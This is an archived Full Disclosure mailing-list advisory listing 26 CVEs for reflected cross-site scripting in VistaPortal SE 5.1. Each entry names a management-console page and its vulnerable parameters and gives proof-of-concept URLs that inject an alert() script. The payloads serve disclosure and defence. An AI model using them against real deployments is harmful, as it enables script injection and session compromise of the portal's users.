lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 5 Dec 2018 12:00:01 +0100
From: Rafael Pedrero <rafael.pedrero@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [CVE-2018-19649, CVE-2018-19765 to CVE-2018-19775,
 CVE-2018-19809 to CVE-2018-19822] - Multiple Cross Site Scripting
 in VistaPortal SE Version 5.1 (build 51029)

Complete list: CVE-2018-19649, CVE-2018-19765, CVE-2018-19766,
CVE-2018-19767, CVE-2018-19768, CVE-2018-19769, CVE-2018-19770,
CVE-2018-19771, CVE-2018-19772, CVE-2018-19773, CVE-2018-19774,
CVE-2018-19775, CVE-2018-19809, CVE-2018-19810, CVE-2018-19811,
CVE-2018-19812, CVE-2018-19813, CVE-2018-19814, CVE-2018-19815,
CVE-2018-19816, CVE-2018-19817, CVE-2018-19818, CVE-2018-19819,
CVE-2018-19820, CVE-2018-19821, CVE-2018-19822

<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19649
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "RolePermissions.jsp" has reflected XSS via ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/RolePermissions.jsp?ConnPoolName=default%27%22%3E%3CScRiPt%3Ealert%28%22xss%22%29%3C/ScRiPt%3E&accessPath=Configuration,Roles&loginPath=_VP_Configuration,_VP_Roles

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19765
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName,
GroupId and ParentId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159&PageId=642&Category=root&ParentId=0
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=642&Category=root&ParentId=0
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=159&PageId=642&Category=root&ParentId=0

Vulnerable parameter: ConnPoolName, GroupId and ParentId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19766
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "GroupRessourceAdmin.jsp" has reflected XSS via ConnPoolName
parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/GroupRessourceAdmin.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,Security
Resources&loginPath=_VP_Configuration,_VP_Security_Resources

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19767
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "PresentSpace.jsp" has reflected XSS via ConnPoolName and GroupId
parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page
Packages,InfoVista
Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package
http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=Page
Packages,InfoVista
Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package

Vulnerable parameters: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19768
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "SubPagePackages.jsp" has reflected XSS via ConnPoolName and
GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page
Packages&loginPath=PagePackageMainFolder
http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5'"><ScRiPt>alert("xss")</ScRiPt>&type=U&DispProfile=true&ConnPoolName=default&accessPath=Page
Packages&loginPath=PagePackageMainFolder

Vulnerable parameters: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19769
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "UserProperties.jsp" has reflected XSS via ConnPoolName.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/UserProperties.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,User
Properties&loginPath=_VP_Configuration,_VP_User_Propertie

Vulnerable parameters: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19770
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "Users.jsp" has reflected XSS via ConnPoolName.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Users.jsp?GZIP=false&type=G&GroupId=6&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,InfoVista
Solutions Users Groups&loginPath=All,InfoVista_Solutions_Users_Groups

Vulnerable parameters: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19771
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPool.jsp" has reflected XSS via PropName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentPool.jsp?PropName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,VistaPortal®
Database
Connection&loginPath=_VP_Configuration,_VP_VistaPortal_Database_Connection

Vulnerable parameter: PropName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19772
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName,
GroupId and ParentId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4&PageId=1&Category=root&ParentId=0
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=1&Category=root&ParentId=0
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&PageId=1&Category=root&ParentId=0

Vulnerable parameter: ConnPoolName, GroupId and ParentId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19773
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentUser.jsp" has reflected XSS via GroupId and
ConnPoolName parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,Super
Administrator&loginPath=All,_superadmin_shadow_
http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=All,Super
Administrator&loginPath=All,_superadmin_shadow_

Vulnerable parameter: GroupId and ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19774
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "PresentSpace.jsp" has reflected XSS via GroupId and ConnPoolName
parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&type=U
http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&type=U

Vulnerable parameter: GroupId and ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19775
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "Variables.jsp" has reflected XSS via ConnPoolName and GroupId
parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=default&GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&CurrentFolder=AdHo
http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&CurrentFolder=AdHo

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19809
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/GroupCopy.jsp" has reflected XSS via
ConnPoolName, GroupId and type parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default
http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P
'"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default

Vulnerable parameter: ConnPoolName, GroupId and type


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19810
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/GroupMove.jsp" has reflected XSS via
ConnPoolName, GroupId and type parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P
'"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default

Vulnerable parameter: ConnPoolName and type


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19811
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Import.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Import.jsp?type=Package&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&ImportAs=159


Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19812
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SubFolderPackages.jsp" has reflected XSS via
GroupId parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SubFolderPackages.jsp?GroupId=5
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=F

Vulnerable parameter: GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19813
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Subscribers.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=P
http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19814
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Subscriptions.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=default&type=P
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=P
http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P

Vulnerable parameter: ConnPoolName, GroupId and type


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19815
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/UserPopupAddNewProp.jsp" has reflected XSS
via ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/UserPopupAddNewProp.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19816
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/categorytree/ChooseCategory.jsp" has
reflected XSS via ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/categorytree/ChooseCategory.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19817
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/AdminAuthorisationFrame.jsp" has reflected
XSS via ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4&UserId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&UserId=4&ConnPoolName=default&type=U

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19818
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Contacts.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Contacts.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19819
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Rights.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Rights.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19820
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Roles.jsp" has reflected XSS via ConnPoolName
parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Roles.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19821
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SecurityPolicies.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SecurityPolicies.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19822
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SharedCriteria.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=U

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists